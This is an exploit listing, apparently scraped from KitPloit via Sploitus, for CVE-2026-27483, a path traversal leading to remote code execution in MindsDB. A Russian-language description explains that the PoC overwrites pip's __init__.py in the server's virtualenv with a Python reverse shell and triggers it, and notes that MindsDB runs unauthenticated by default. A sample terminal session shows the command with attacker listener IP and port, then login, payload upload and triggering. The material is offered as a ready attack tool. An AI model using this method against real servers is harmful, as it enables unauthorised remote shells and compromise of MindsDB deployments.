Sploitus

Exploit for cve-2026-27483 CVE-2026-27483

kitploit · 2026-09-04

Exploit Code

MARKDOWN39 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-THEWHITEH4T-CVE-2026-27483
# CVE-2026-27483

## PoC: Path Traversal до RCE в MindsDB

Этот PoC-скрипт основан на следующем уведомлении о безопасности GitHub

  * По умолчанию MindsDB **не** использует аутентификацию
  * PoC поддерживает оба режима: **неаутентифицированный** и **аутентифицированный**
  * Мы можем запросить `/api/handlers/`, чтобы найти доступные обработчики; используйте имя любого доступного, но не установленного обработчика
  * PoC перезаписывает `/venv/lib/python3.10/site-packages/pip/__init__.py`
  * Python-реверс-шелл записывается по указанному выше пути, а затем запускается



root@kitploit:~
    
    
    python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password
    
    -------------------------------------
    --- CVE-2026-27483 ------------------
    --- MindsDB Path Traversal to RCE ---
    -------------------------------------
    
    [>] Found By : XlabAITeam
    [>] PoC By   : Lohitya Pushkar (thewhiteh4t)
    
    [>] Target   : http://127.0.0.1:47334
    [>] LHOST    : 192.168.0.100
    [>] LPORT    : 4444
    
    [*] Checking status...
    
    [*] MindsDB Version : 25.9.1.0
    [+] Login successful!
    [*] Uploading payload : qwvhotfj
    [+] Payload uploaded!
    [*] Triggering payload...